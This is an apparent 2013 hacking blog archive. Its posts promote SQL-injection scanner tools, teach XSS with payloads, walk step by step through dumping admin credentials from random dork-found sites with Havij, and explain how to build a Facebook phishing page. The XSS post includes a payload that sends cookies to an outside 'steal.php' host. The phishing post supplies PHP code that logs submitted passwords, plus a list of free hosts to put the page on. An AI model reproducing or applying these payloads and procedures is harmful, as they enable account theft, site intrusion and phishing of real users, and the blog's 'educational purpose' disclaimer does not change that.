Friday, August 2, 2013

Sql Poizon Free Download

0 comments

SQL POIZEN



=> Sql poizon tool includes php, asp, rfi, lfi dorks. You can scan site by google dorks. And fix vulnerable sites. This software allows you to scan site based on country. After scan site you can crawl sites for checking vulnerability. You also can inject by this tools. Lets see screenshot of this tool:














Thursday, August 1, 2013

Gr3eNoX Exploit Scanner SQLi/XSS/LFi/RFi v1.1

0 comments



Updates
=======
  • XSS Scanner
  • RFi Scanner Bug fixed
  • Remove Duplicate algorithm changed



Basics of XSS injection [Beginner Tutorial]

0 comments


What is Cross Site Scripting:

XSS Stands for Cross Site Scripting, xss is a vulnerability that is normal found
in a web app. XSS allows the user to inject malicious codes such as HTML and
Java script. XSS can be used to steal cookies, make phishing pages and
just having some fun with the website.



What is A cookie:

A cookie is a text-only string that gets entered into the memory of your browser.
This value of a variable that a website sets. If the lifetime of this value is set
to be longer than the time you spend at that site, then this string
is saved to file for future reference.



What can XSS do:

Cross Site Scripting is used commonly now days in the cyber
world. XSS can take down most websites that are up to date,
Cross Site Scripting can steal cookies from websites/forums.
Make pop ups, appear were there not suppose to "search bars"
etc. Or you can even do some very malicious codes such as
redirect the website to another one.



Hacking forums/guest books with XSS:

Forum Hacking: Now in order to defaced or even attempt
to hack a forum. The forum must have HTML enabled, so you can
enter some malicious codes. If the forum does have HTML enabled
then you can enter codes such as;


+++++++
Code:

+++++++

<html>
<head><title>XSS By Safe Hacking </title></head>
<body>
<img src="javascript:alert('Defaced By Unknown')">
</body>
</html>


If the forum allows the imagen tags then you can use this tag to
steal peoples cookies.


++++++
Code:

++++++

<img src="javascript:window.location=&amp;#39;http://www.url.com/steal.php?account=&amp;#39;+document.cookie&quot;>


Now to get to guest book hacking when your posting on the guest book
it must also be vulnerable. Meaning html must be enabled, to see if html
is enabled put these tags in your post <B>hello world</B> and if your
text comes back bold. Then html is enabled now try doing other techniques
you can also put some java script inside the html and see if that works.
And if it does or if it doesn't you can still deface the guest book with writing
up some cool html codes that take up the whole guest book page.



Defacing Websites with Cross Site Scripting:

Till now you AHian know Cross Site Scripting is used alot now days to exploit
websites and forums.Mostly search functions etc. Now some of the common XSS'es now days are within the search bars for websites. To make a box pop
up saying what every you put in the script. Some XSS codes are;


++++++

Code:
++++++

<script>alert("Safe Hacking")</script> <BODY ONLOAD=alert(document.cookie)>"><script>alert("Safe Hacking");</script> <script>window.document.write("<input type='file'>");</script> <a rel='nofollow' href='search?searchterm=<b>safehacking made you click on link</b>'>safehacking`</a>


Now how can I deface a website with just making 1 little pop up on
the search bar page? You can redirect the site to your website or your friends or you can steel cookies. Make a html defacement page and put the whole code
in your script. You can do many things, with java script on a vulnerable
website.

Wednesday, July 31, 2013

SQL INJECTION WITH HAVIJ + DOWNLOAD FULL VERSION'S

0 comments
Note :  For the security reason the link is censored.
=======================================


Step 1 :
----------

Find a Vulnerable site Using The Google Dork.

U can Find it here : 

 http://safehacking4mas.blogspot.in/2011/05/useful-dork-list-for-sql-injection.html

Check The site is vulnerable or not Using The    '    After the id or other perameter.

If u get an error so the site is vulnerable to sql injection attack. If not than try other site.


Step 2:
---------

Download the Full Version  Which You Would Like.
=======================================








Step 3:
----------

Now Open The Havij Tool.



And Put the vulnerable Link  on the bar and Start Attacking.




Step 4:
----------

After the tool trying automated queries on the website and provide the database name.




Step 5:
----------

Go to table and click on the database name and click on the Get table.



Next Click On the Get Colums.



And You Get the all colums that u want,


In there the admin and pass or id Filed You have shown.

Just tick on it and Click on the Get Data.



After Take a time and u have the admin and password of the site.

Sometimes mostly the password in Hash B'coz of security.


Step 6:
----------

After the Login details You have got u need to Login Panel Of the site.

Go to the Find Admin Tab And search it.

It takes some time and You Have got the admin panel link of the site just go to 

the link and login and do what u want to with site.


Monday, July 29, 2013

Phishing Attack - What? How to Make ? How It Works?

2 comments
Phishing ?
========
Phishing is the process of stealing sensitive information, such as usernames, passwords, and bank information, 
by pretending to be someone you’re not. An example of this would be if you receive and e-mail from a hacker 
pretending to be your bank. In this e-mail, it might tell you that you need to update your account before it expires, 
and then the hacker provides a link. Once you click on the link, you arrive at a website that looks exactly like 
your actual bank page. In reality it’s just a perfect replica, and when you input your login details, it sends it to 
the hackers email or stores it on his web server. Hackers that create the best, most deceiving phishing web 
pages are knowledgeable in the area of HTML and the PHP programming. Below I will show a simple example 
of some of the steps a hacker might take to create a phishing website. By seeing the steps a hacker would take,
 will help you defend against such an attack.


How To Make A Phishing Page Of Any Website ?
=====================================

Now  A Days The Major Companies Like Facebook, Google , Yahoo, Pinterest, etc.

All are in the competition but everyday 1000 of Account's are hack.

Steps Of Create Phish Page:

1. Go to the site which u want to make a phish page...




2. I will choose the "FACEBOOK"

3. After the site is open you can click ur mouse right click and choose the "view page source" option.





4. Copy the all code to notepad..



Now the actual hacking is begin..

5. After complete the copy u need to find login_form like this...

    In there u need to change the link to ur .php file.

    This is action of login and sending the data to server we can change it  with simple 
   
    "mail.php"  .  So all the data gone to our server where we hosted our phish files.

   

6.  Php script For any phishing page.

###########
##   Code:  ##
###########

<?php
header ('Location: https://www.facebook.com/pages/create/ ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;

?>

Copy this code and save in  "mail.php"  format.


7. Create a simple blank txt file and give them name " log.txt " .



And Done. Your phishing site is ready.




How to Use This Phishing Pages For Hacking Purpose ?
===========================================

1.    The first need to do Phishing Attack U need a Free Hosting sites. I provide u Many as 
        
       Follow :

       
Hosting Website That I Recommend:   http://000webhost.com/
      
Other Hosting Websites That You May Like:

* 110mb -                              http://110mb.com
* Ripway -                             http://ripway.com
* SuperFreeHost -               http://superfreehost.info
* Freehostia -                       http://freehostia.com
* Funpic -                              http://funpic.de 
* Funpic -                              http://funpic.org 
* Freeweb7 -                        http://freeweb7.com
* t35 -                                    http://t35.com
* Awardspace -                    http://awardspace.com
* PHPNet -                            http://phpnet.us
* Free Web Hosting Pro -   http://freewebhostingpro.com
* ProHosts -                          http://prohosts.org
* AtSpace -                           http://atspace.com
* 000webhost -                    http://000webhost.com/
* My5GB -                            http://www.my5gb.com/
* Oxyhost -                           http://www.oxyhost.com/
* Rack111 -                         http://www.rack111.com/
* Ocostwebhost -                http://0costwebhost.com/
* FreeZoka -                        http://www.freezoka.com/






2. After completed the Register u have a user name and pass to login.





3. Upload the phishing files to the server.





4. Now Test That it's working or not.

5. Open Your Domain which will you see in ur hosting site panel.



6. U see the phish page which u had uploaded open it...




7. After the page Loded u can put Your ID & PASSWORD ( i wrote this detail to the phish page)





    When u click on the login button it's sends the logs to our server.

8. Check this Log file & edit it & You see the logins with password.




Hope You Guys Enjoyed The Phishing Attack,,

If You Like It So plz... Comment....

NOTE :  This is Only For Educational Purpose.